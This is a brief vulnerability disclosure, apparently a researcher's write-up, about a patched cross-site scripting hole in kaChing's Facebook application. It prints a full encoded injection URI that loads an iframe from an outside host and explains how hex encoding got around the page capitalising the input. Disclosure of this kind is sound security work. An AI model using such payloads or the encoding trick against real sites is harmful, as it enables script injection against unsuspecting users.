Facebook Verified Application
Current Monthly Active Users: 28,778
Current Rank on Application Leaderboard: 963
Application Developer: kaChing Group, Inc.
Responsiveness: I received an e-mail from kaChing saying the patch was fixed about six hours after notifying them.
Vulnerability Status: Patched
Capable of Clickjacking Install: Uncertain
Example URI: http://apps.facebook.com/kaching/portfolio/trade?symbol=%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.kaching.com%2F%26%23×66%3B%26%23×62%3B%2F%26%23×70%3B%26%23×6F%3B%26%23×72%3B%26%23×74%3B%26%23×66%3B%26%23×6F%3B%26%23×6C%3B%26%23×69%3B%26%23×6F%3B%2F%26%23×74%3B%26%23×72%3B%26%23×61%3B%26%23×64%3B%26%23×65%3B%3F%26%23×73%3B%26%23×79%3B%26%23×6D%3B%26%23×62%3B%26%23×6F%3B%26%23×6C%3B%3D%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E%22%3E
Notes: This hole was very straightforward, but fully exploiting it required one more trick. Since the injected parameter was a stock symbol, the resulting page would automatically capitalize the input when displaying an error message. That meant that the injected URI became uppercase when it needed to be lowercase. To combat that issue, I converted the text parts of the URI to hex encodings, then had to encode those values for a URI. All these steps resulted in the rather lengthy URI above, which did preserve capitalization.
P.S. Those should be lowercase x’s in the example URI.
Share with your friends!